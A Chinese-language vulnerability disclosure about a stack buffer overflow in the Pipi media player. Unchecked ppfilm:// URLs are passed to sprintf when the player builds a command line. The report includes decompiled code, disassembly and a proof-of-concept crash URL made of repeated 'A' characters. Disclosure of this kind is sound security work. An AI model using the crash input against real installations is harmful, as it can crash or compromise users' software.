简要描述:
皮皮播放器在处理用户输入的URL时,没有对其长度进行检测,从而造成溢出
详细说明:
皮皮播放器在处理用户输入的URL时,没有对其进行长度检测。
从而造成溢出。
不过，由于存在 GS 栈保护（栈 cookie），利用时有些困难。
case 32780: v9 = *(_DWORD *)(wParam + 4096); v22 = 0; v21 = v9; *(_DWORD *)(wParam + 6344) = 1; sub_40D480(v21, v22); v42 = 5; if ( CDialog::DoModal(&v31) == 1 && ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::Find(&v32, "://", 0) > 0 ) { v10 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32); if ( strnicmp(v10, "ppfilm://", 9u) // 对输入的内容,比较前9位是否为ppfilm:// && (v11 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32), strnicmp(v11, "pvod://", 7u)) ) { v22 = 0; v21 = v12; v29 = &v21; ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>( &v21, &Default); v20 = v13; v28 = &v20; LOBYTE(v42) = 6; ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>( &v20, &Default); v18 = v14; *(_DWORD *)&Drive = &v18; v41 = 7; ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(&v18); LOBYTE(v42) = 5; sub_4304F0(v3, v19, v20, v21, v22); } else { CommandLine = 0; memset(&v34, 0, 0x1FCu); v35 = 0; v36 = 0; sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32); //将输入的内容,直接调用sprintf函数,将其组合好的内容存放到CommandLine变量。 memset(&StartupInfo, 0, sizeof(StartupInfo)); ProcessInformation.hProcess = 0; ProcessInformation.hThread = 0; ProcessInformation.dwProcessId = 0; ProcessInformation.dwThreadId = 0; StartupInfo.cb = 68; CreateProcessA(0, &CommandLine, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation); if ( ProcessInformation.hThread ) CloseHandle(ProcessInformation.hThread); if ( (_DWORD)ProcessInformation.hProcess ) CloseHandle(ProcessInformation.hProcess); } } *(_DWORD *)(v3 + 6344) = 0; v42 = -1; result = sub_40D500(&v31); break;
//////////////////////////////////////////////////////////////
对传入的 URL 没有做任何长度检测，就直接调用 sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32);
把 URL 格式化写入栈上固定大小的 CommandLine 缓冲区；sprintf 本身不做边界检查，超长的 URL 便会越过缓冲区末尾，从而造成栈溢出。
我们可以看到,在函数开始的地方,
text:00430C20 push ebp
.text:00430C21 mov ebp, esp
.text:00430C23 and esp, 0FFFFFFF8h
.text:00430C26 push 0FFFFFFFFh
.text:00430C28 push offset SEH_430C20
.text:00430C2D mov eax, large fs:0
.text:00430C33 push eax
.text:00430C34 mov large fs:0, esp
.text:00430C3B sub esp, 5F8h
// 该函数一共在栈上分配了 0x5F8 字节的局部变量空间。
漏洞证明:
我们构造如下URL:
“ppfilm://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”